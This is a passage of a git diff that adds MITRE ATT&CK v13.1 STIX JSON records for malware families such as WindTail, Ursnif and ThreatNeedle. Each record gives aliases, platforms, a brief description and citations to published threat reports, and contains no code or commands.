+ "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0466", + "url": "https://attack.mitre.org/software/S0466" + }, + { + "source_name": "SANS Windshift August 2018", + "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf", + "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020." + }, + { + "source_name": "objective-see windtail1 dec 2018", + "url": "https://objective-see.com/blog/blog_0x3B.html", + "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019." + }, + { + "source_name": "objective-see windtail2 jan 2019", + "url": "https://objective-see.com/blog/blog_0x3D.html", + "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[WindTail](https://attack.mitre.org/software/S0466) is a macOS surveillance implant used by [Windshift](https://attack.mitre.org/groups/G0112). [WindTail](https://attack.mitre.org/software/S0466) shares code similarities with Hack Back aka KitM OSX.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)", + "modified": "2022-04-20T22:03:11.833Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "WindTail", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0db09158-6e48-4e7c-8ce7-2b10b9c0c039.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0db09158-6e48-4e7c-8ce7-2b10b9c0c039.json new file mode 100644 index 0000000000000000000000000000000000000000..c9bb9cd6acb0af472c21ef322bd4211eb7db4eb5 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0db09158-6e48-4e7c-8ce7-2b10b9c0c039.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--bd23d29f-1b74-487f-8324-eeac231f4fca", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-30T21:01:41.137Z", + "name": "Misdat", + "description": "[Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used in [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) from 2010 to 2011.(Citation: Cylance Dust Storm)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "Misdat" + ], + "type": "malware", + "id": "malware--0db09158-6e48-4e7c-8ce7-2b10b9c0c039", + "created": "2017-05-31T21:32:55.126Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0083", + "external_id": "S0083" + }, + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0e18b800-906c-4e44-a143-b11c72b3448b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0e18b800-906c-4e44-a143-b11c72b3448b.json new file mode 100644 index 0000000000000000000000000000000000000000..bafd78d23babc23906a2912381605e9d18b1cec8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0e18b800-906c-4e44-a143-b11c72b3448b.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--804445bf-5611-4f0f-bec0-18b529abbe27", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "FLIPSIDE" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0e18b800-906c-4e44-a143-b11c72b3448b", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0173", + "external_id": "S0173" + }, + { + "source_name": "FLIPSIDE", + "description": "(Citation: Mandiant FIN5 GrrCON Oct 2016)" + }, + { + "url": "https://www.youtube.com/watch?v=fevGZs0EQu8", + "description": "Bromiley, M. and Lewis, P. (2016, October 7). Attacking the Hospitality and Gaming Industries: Tracking an Attacker Around the World in 7 Years. Retrieved October 6, 2017.", + "source_name": "Mandiant FIN5 GrrCON Oct 2016" + } + ], + "modified": "2020-03-30T16:24:24.753Z", + "name": "FLIPSIDE", + "description": "[FLIPSIDE](https://attack.mitre.org/software/S0173) is a simple tool similar to Plink that is used by [FIN5](https://attack.mitre.org/groups/G0053) to maintain access to victims. (Citation: Mandiant FIN5 GrrCON Oct 2016)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0efefea5-78da-4022-92bc-d726139e8883.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0efefea5-78da-4022-92bc-d726139e8883.json new file mode 100644 index 0000000000000000000000000000000000000000..a51f8b039baf02e3a7620f1585ca0afede2c9000 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0efefea5-78da-4022-92bc-d726139e8883.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--36cb875c-2f99-4429-bd58-516978f7a723", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Linux Rabbit" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0efefea5-78da-4022-92bc-d726139e8883", + "type": "malware", + "created": "2019-03-04T17:12:37.586Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0362", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0362" + }, + { + "source_name": "anomali-linux-rabbit", + "url": "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat", + "description": "Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved December 17, 2020." + }, + { + "source_name": "Anomali Linux Rabbit 2018", + "url": "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat", + "description": "Anomali Labs. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved March 4, 2019." + } + ], + "modified": "2020-12-22T15:46:17.965Z", + "name": "Linux Rabbit", + "description": "[Linux Rabbit](https://attack.mitre.org/software/S0362) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.(Citation: Anomali Linux Rabbit 2018)\n", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0f1ad2ef-41d4-4b7a-9304-ddae68ea3005.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0f1ad2ef-41d4-4b7a-9304-ddae68ea3005.json new file mode 100644 index 0000000000000000000000000000000000000000..dbae826746c2b03736b0be9dfafa41c69ef6fefe --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0f1ad2ef-41d4-4b7a-9304-ddae68ea3005.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--607f9eef-290b-4ddb-b5ca-4bc04d74249f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Ryan Becwar" + ], + "x_mitre_aliases": [ + "adbupd" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0f1ad2ef-41d4-4b7a-9304-ddae68ea3005", + "type": "malware", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0202", + "external_id": "S0202" + }, + { + "source_name": "adbupd", + "description": "(Citation: Microsoft PLATINUM April 2016)" + }, + { + "url": "https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf", + "description": "Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.", + "source_name": "Microsoft PLATINUM April 2016" + } + ], + "modified": "2020-03-30T18:33:31.623Z", + "name": "adbupd", + "description": "[adbupd](https://attack.mitre.org/software/S0202) is a backdoor used by [PLATINUM](https://attack.mitre.org/groups/G0068) that is similar to [Dipsind](https://attack.mitre.org/software/S0200). (Citation: Microsoft PLATINUM April 2016)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0f862b01-99da-47cc-9bdb-db4a86a95bb1.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0f862b01-99da-47cc-9bdb-db4a86a95bb1.json new file mode 100644 index 0000000000000000000000000000000000000000..05206b3a1202a7dc1e152a708378d562dc238716 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--0f862b01-99da-47cc-9bdb-db4a86a95bb1.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--b4813f35-c607-4938-ba40-d0913a81101b", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Emissary" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0f862b01-99da-47cc-9bdb-db4a86a95bb1", + "type": "malware", + "created": "2017-05-31T21:32:54.772Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0082", + "external_id": "S0082" + }, + { + "source_name": "Emissary", + "description": "(Citation: Lotus Blossom Dec 2015)" + }, + { + "source_name": "Lotus Blossom Dec 2015", + "description": "Falcone, R. and Miller-Osborn, J.. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/" + } + ], + "modified": "2021-08-09T14:21:48.477Z", + "name": "Emissary", + "description": "[Emissary](https://attack.mitre.org/software/S0082) is a Trojan that has been used by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It shares code with [Elise](https://attack.mitre.org/software/S0081), with both Trojans being part of a malware group referred to as LStudio. (Citation: Lotus Blossom Dec 2015)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--11194d8b-fdce-45d2-8047-df15bb8f16bd.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--11194d8b-fdce-45d2-8047-df15bb8f16bd.json new file mode 100644 index 0000000000000000000000000000000000000000..0c7c5c6a1334b74f17c717f192ca4c6f5490bacd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--11194d8b-fdce-45d2-8047-df15bb8f16bd.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--c542e422-fb91-4a9c-b96b-d24b817b4fe7", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Exaramel for Linux" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--11194d8b-fdce-45d2-8047-df15bb8f16bd", + "type": "malware", + "created": "2019-08-26T13:02:46.378Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0401", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0401" + }, + { + "source_name": "Exaramel for Linux", + "description": "(Citation: ESET TeleBots Oct 2018)" + }, + { + "source_name": "ESET TeleBots Oct 2018", + "url": "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", + "description": "Cherepanov, A., Lipovsky, R. (2018, October 11). New TeleBots backdoor: First evidence linking Industroyer to NotPetya. Retrieved November 27, 2018." + } + ], + "modified": "2021-04-14T22:43:50.451Z", + "name": "Exaramel for Linux", + "description": "[Exaramel for Linux](https://attack.mitre.org/software/S0401) is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under [Exaramel for Windows](https://attack.mitre.org/software/S0343).(Citation: ESET TeleBots Oct 2018)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--123bd7b3-675c-4b1a-8482-c55782b20e2b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--123bd7b3-675c-4b1a-8482-c55782b20e2b.json new file mode 100644 index 0000000000000000000000000000000000000000..60d25d19f9579d96791774aeeb873cde4d037f8e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--123bd7b3-675c-4b1a-8482-c55782b20e2b.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--d1ab8cd7-940a-43b1-8d28-ac71dad01bfb", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "BUBBLEWRAP", + "Backdoor.APT.FakeWinHTTPHelper" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--123bd7b3-675c-4b1a-8482-c55782b20e2b", + "type": "malware", + "created": "2017-05-31T21:32:33.738Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0043", + "external_id": "S0043" + }, + { + "source_name": "FireEye admin@338", + "description": "FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.", + "url": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" + } + ], + "modified": "2020-03-30T15:03:26.307Z", + "name": "BUBBLEWRAP", + "description": "[BUBBLEWRAP](https://attack.mitre.org/software/S0043) is a full-featured, second-stage backdoor used by the [admin@338](https://attack.mitre.org/groups/G0018) group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. (Citation: FireEye admin@338)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--12a7450d-b03e-4990-a5b8-b405ab9c803b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--12a7450d-b03e-4990-a5b8-b405ab9c803b.json new file mode 100644 index 0000000000000000000000000000000000000000..9671b67ef6c90bb0d2955ad50cf6fc165c9fed52 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--12a7450d-b03e-4990-a5b8-b405ab9c803b.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--6c25450c-28d6-4fe4-8d4b-81a465ae92c5", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "HAWKBALL" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--12a7450d-b03e-4990-a5b8-b405ab9c803b", + "type": "malware", + "created": "2019-06-20T14:52:45.057Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0391", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0391" + }, + { + "source_name": "HAWKBALL", + "description": "(Citation: FireEye HAWKBALL Jun 2019)" + }, + { + "description": "Patil, S. and Williams, M.. (2019, June 5). Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities. Retrieved June 20, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html", + "source_name": "FireEye HAWKBALL Jun 2019" + } + ], + "modified": "2020-03-30T16:46:39.617Z", + "name": "HAWKBALL", + "description": "[HAWKBALL](https://attack.mitre.org/software/S0391) is a backdoor that was observed in targeting of the government sector in Central Asia.(Citation: FireEye HAWKBALL Jun 2019)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--13183cdf-280b-46be-913a-5c6df47831e7.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--13183cdf-280b-46be-913a-5c6df47831e7.json new file mode 100644 index 0000000000000000000000000000000000000000..c2ed382c74d3779c7fe64548c3762eaac92671cd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--13183cdf-280b-46be-913a-5c6df47831e7.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--fde7622b-d628-4cf5-928c-9a831bd096a8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-05T16:04:51.193Z", + "name": "PS1", + "description": "[PS1](https://attack.mitre.org/software/S0613) is a loader that was used to deploy 64-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "PS1" + ], + "type": "malware", + "id": "malware--13183cdf-280b-46be-913a-5c6df47831e7", + "created": "2021-05-24T14:55:59.316Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0613", + "external_id": "S0613" + }, + { + "source_name": "BlackBerry CostaRicto November 2020", + "description": "The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.", + "url": "https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1492d0f8-7e14-4af3-9239-bc3fe10d3407.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1492d0f8-7e14-4af3-9239-bc3fe10d3407.json new file mode 100644 index 0000000000000000000000000000000000000000..5a50ff6f85fcda624a54e7e37b7ea722100dc687 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1492d0f8-7e14-4af3-9239-bc3fe10d3407.json @@ -0,0 +1,82 @@ +{ + "type": "bundle", + "id": "bundle--c77e8035-6ca8-451e-94ae-496198e6e7a5", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T05:42:32.541Z", + "name": "Ursnif", + "description": "[Ursnif](https://attack.mitre.org/software/S0386) is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)s, and malicious links.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016) [Ursnif](https://attack.mitre.org/software/S0386) is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.(Citation: TrendMicro Ursnif Mar 2015)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.4", + "x_mitre_aliases": [ + "Ursnif", + "Gozi-ISFB", + "PE_URSNIF", + "Dreambot" + ], + "type": "malware", + "id": "malware--1492d0f8-7e14-4af3-9239-bc3fe10d3407", + "created": "2019-06-04T18:42:22.552Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0386", + "external_id": "S0386" + }, + { + "source_name": "Gozi-ISFB", + "description": "(Citation: FireEye Ursnif Nov 2017)(Citation: ProofPoint Ursnif Aug 2016)" + }, + { + "source_name": "Ursnif", + "description": "(Citation: NJCCIC Ursnif Sept 2016)" + }, + { + "source_name": "Dreambot", + "description": "(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016)" + }, + { + "source_name": "PE_URSNIF", + "description": "(Citation: TrendMicro Ursnif Mar 2015)" + }, + { + "source_name": "TrendMicro Ursnif Mar 2015", + "description": "Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992" + }, + { + "source_name": "NJCCIC Ursnif Sept 2016", + "description": "NJCCIC. (2016, September 27). Ursnif. Retrieved June 4, 2019.", + "url": "https://www.cyber.nj.gov/threat-profiles/trojan-variants/ursnif" + }, + { + "source_name": "ProofPoint Ursnif Aug 2016", + "description": "Proofpoint Staff. (2016, August 25). Nightmare on Tor Street: Ursnif variant Dreambot adds Tor functionality. Retrieved June 5, 2019.", + "url": "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" + }, + { + "source_name": "FireEye Ursnif Nov 2017", + "description": "Vaish, A. & Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved June 5, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--16040b1c-ed28-4850-9d8f-bb8b81c42092.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--16040b1c-ed28-4850-9d8f-bb8b81c42092.json new file mode 100644 index 0000000000000000000000000000000000000000..fecd19e1f33e1e2de5bfc020cd4e329abf4bd384 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--16040b1c-ed28-4850-9d8f-bb8b81c42092.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--48d71235-3262-4c60-bc83-df921a9d0ca2", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-26T20:18:23.760Z", + "name": "ThreatNeedle", + "description": "[ThreatNeedle](https://attack.mitre.org/software/S0665) is a backdoor that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2019 to target cryptocurrency, defense, and mobile gaming organizations. It is considered to be an advanced cluster of [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Manuscrypt (a.k.a. NukeSped) malware family.(Citation: Kaspersky ThreatNeedle Feb 2021)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "ThreatNeedle" + ], + "type": "malware", + "id": "malware--16040b1c-ed28-4850-9d8f-bb8b81c42092", + "created": "2021-11-30T15:46:36.159Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0665", + "external_id": "S0665" + }, + { + "source_name": "Kaspersky ThreatNeedle Feb 2021", + "description": "Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021.", + "url": "https://securelist.com/lazarus-threatneedle/100803/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--166c0eca-02fd-424a-92c0-6b5106994d31.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--166c0eca-02fd-424a-92c0-6b5106994d31.json new file mode 100644 index 0000000000000000000000000000000000000000..208667aa89d19ab5b157dd2fa43ccb1a0204a3c4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--166c0eca-02fd-424a-92c0-6b5106994d31.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--e1fe3165-a539-4fec-861a-39017a4add12", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-30T20:52:00.462Z", + "name": "ZLib", + "description": "[ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant during [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) since at least 2014. [ZLib](https://attack.mitre.org/software/S0086) is malware and should not be confused with the legitimate compression library from which its name is derived.(Citation: Cylance Dust Storm)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "ZLib" + ], + "type": "malware", + "id": "malware--166c0eca-02fd-424a-92c0-6b5106994d31", + "created": "2017-05-31T21:32:56.394Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0086", + "external_id": "S0086" + }, + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5.json new file mode 100644 index 0000000000000000000000000000000000000000..772252f91e09631cd40e0a9b6bc7929b03891647 --- /dev/null +++ 